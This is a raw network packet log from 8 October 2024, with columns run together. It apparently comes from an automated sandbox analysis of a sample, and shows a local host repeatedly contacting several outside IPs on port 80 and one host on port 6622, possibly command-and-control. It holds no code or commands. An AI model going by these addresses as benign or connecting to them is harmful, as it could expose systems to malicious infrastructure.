                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259205103 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.264153957 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.264591932 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.370683908 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.370968103 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.371083975 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.371380091 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.375868082 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.582818985 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.587738037 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.587990999 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.593101978 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.593122005 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.598200083 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.598215103 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.713265896 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.713567972 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.713654995 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.713768959 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.721602917 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.732242107 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737166882 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737488985 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737740993 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737752914 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.742707014 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.742885113 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.086534023 CEST501436622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.091619015 CEST662250143204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.091994047 CEST501436622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.097493887 CEST501436622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.102421045 CEST662250143204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.238662004 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.238812923 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.238871098 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.240226984 CEST5014280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.245187044 CEST805014244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.266530037 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.271699905 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.274609089 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.274794102 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.274823904 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.280101061 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.280158997 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.473031044 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.473376989 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.474117994 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.474117994 CEST5014180192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.479026079 CEST805014134.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.741008997 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.741535902 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.741605043 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.741806030 CEST5014480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.746562004 CEST805014444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.778594971 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.783560038 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.783803940 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.784451962 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.784451962 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.789271116 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.789341927 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.944025040 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.949095011 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.953640938 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.953923941 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.953958988 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.959289074 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.959460974 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.582926035 CEST662250143204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.582997084 CEST501436622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.583316088 CEST501436622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.588737965 CEST662250143204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.694133997 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.694339991 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695363998 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695427895 CEST5014680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.699419022 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.892044067 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.896986961 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898679018 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898819923 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898859978 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.903839111 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.903997898 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.110538960 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.110953093 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.111071110 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.111253977 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.116348982 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.505544901 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.510984898 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.511414051 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.522420883 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.767930984 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.767950058 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768089056 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768100977 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768120050 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768156052 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768156052 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768591881 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.145581961 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.146946907 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.150486946 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.151837111 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.160375118 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.165304899 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166609049 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166729927 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166758060 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.171948910 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.171986103 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.271523952 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.276477098 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.276552916 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.287456989 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.287564993 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732120991 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732471943 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.734539032 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.774288893 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.779226065 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241172075 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241266966 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241468906 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.246397972 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.367583990 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.372881889 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.372953892 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379132032 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379172087 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.384459019 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.384654999 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.506442070 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.506613016 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.506844997 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.510409117 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.515928984 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.538343906 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.544115067 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.544218063 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.546307087 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.546348095 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.553111076 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.553456068 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.130074978 CEST501536622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.135330915 CEST662250153204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.135404110 CEST501536622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.139045000 CEST501536622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.144133091 CEST662250153204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.303603888 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.304013968 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.304060936 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.505219936 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.508604050 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.697092056 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.697303057 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.697376013 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.002684116 CEST5015280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.006912947 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.008346081 CEST805015234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.008735895 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.012367964 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.013895035 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.034996033 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.040045977 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.040100098 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.046932936 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.048455000 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.053267956 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.054306030 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.515252113 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.520668030 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.520740986 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.521245956 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.521275997 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.526211023 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.526829004 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.615304947 CEST662250153204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.615403891 CEST501536622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.615468979 CEST501536622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.620426893 CEST662250153204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.261063099 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.261627913 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.261667967 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.280920982 CEST5015580192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.286587000 CEST805015534.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.371695042 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.371923923 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.371995926 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.372055054 CEST5015480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.376848936 CEST805015447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.387295961 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392307043 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392545938 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392673969 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392673969 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.397926092 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.397939920 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.473786116 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.479007959 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.482593060 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.486201048 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.491229057 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.561511040 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567365885 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567493916 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.573240042 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.573651075 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.865526915 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.865700960 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.866553068 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.866553068 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.872234106 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.886312008 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.891412973 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894635916 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894870043 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894889116 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.901804924 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.902024984 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636181116 CEST805015935.164.78.200192.168.2.4
